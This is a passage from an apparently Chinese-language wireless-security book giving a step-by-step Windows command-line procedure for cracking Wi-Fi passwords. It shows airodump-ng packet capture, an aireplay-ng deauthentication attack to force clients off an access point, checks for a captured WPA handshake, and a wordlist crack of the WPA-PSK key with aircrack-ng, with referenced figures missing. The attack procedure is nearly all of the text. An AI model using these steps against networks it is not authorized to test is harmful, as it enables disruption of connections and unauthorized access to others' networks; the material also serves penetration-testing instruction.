airodump-ng --channel number -w filename 127.0.0.1:666
这里输入“airodump-ng --channel 7 -w onewpa 127.0.0.1:666”,回车后可看到如图5-32所示的内容
图5-32 在CMD下运行airodump-ng进行抓包
步骤3:现在,就可以和前面在BackTrack 2中讲述的一样进行Deauth攻击了,另开启一个CMD,输入(如图5-33所示):
aireplay-ng -0 1 -a AP’s MAC 127.0.0.1:666
参数解释参考前面对应章节。
图5-33 进行Deauth攻击
在个别情况下,可能会在上面命令结束时出现wi_write<>:Operation now progress这样的提示,这个提示在很多无线网卡下都会出现,意思是当前进程调用被占用时,Deauth攻击在大多数情况下并不会受此影响。
步骤4:再开启一个CMD,输入命令查看是否捕获到WPA握手数据包。
命令如下:
aircrack-ng 捕获的数据包名
如果没有捕获到WPA握手数据包,就会有如图5-34所显示的“0 handshake”,这个时候切回到刚才aireplay-ng 所在的CMD中重复进行Deauth攻击。
图5-34 没有获取到WPA握手数据包
攻击过程中注意观察airodump-ng工作界面,当右上角出现如图5-35所示的提示时,就表示成功截获到WPA握手数据包了。
图5-35 成功获取到WPA握手数据包
此时再次使用aircrack-ng 打开捕获的数据包,就可以看到截获到WPA <1 handshake>的显示了,如图5-36所示,接下来便可以进行WPA本地破解了。
图5-36 载入破解时成功识别出获得的WPA握手数据包
破解WPA-PSK输入命令如下:
aircrack-ng -w password.txt onewpa*.cap
这里介绍一个小技巧,可以在输入数据包名后面加一个*号,来自动将捕获的该名称的所有数据包整合导入。
回车后,显示如图5-37所示。
图5-37 在CMD下破解WPA-PSK加密
如同在Linux下破解WPA一般耐心地等待,就可以看到WPA密钥成功解出了,如图5-38所示。
图5-38 成功破解出WPA-PSK密码。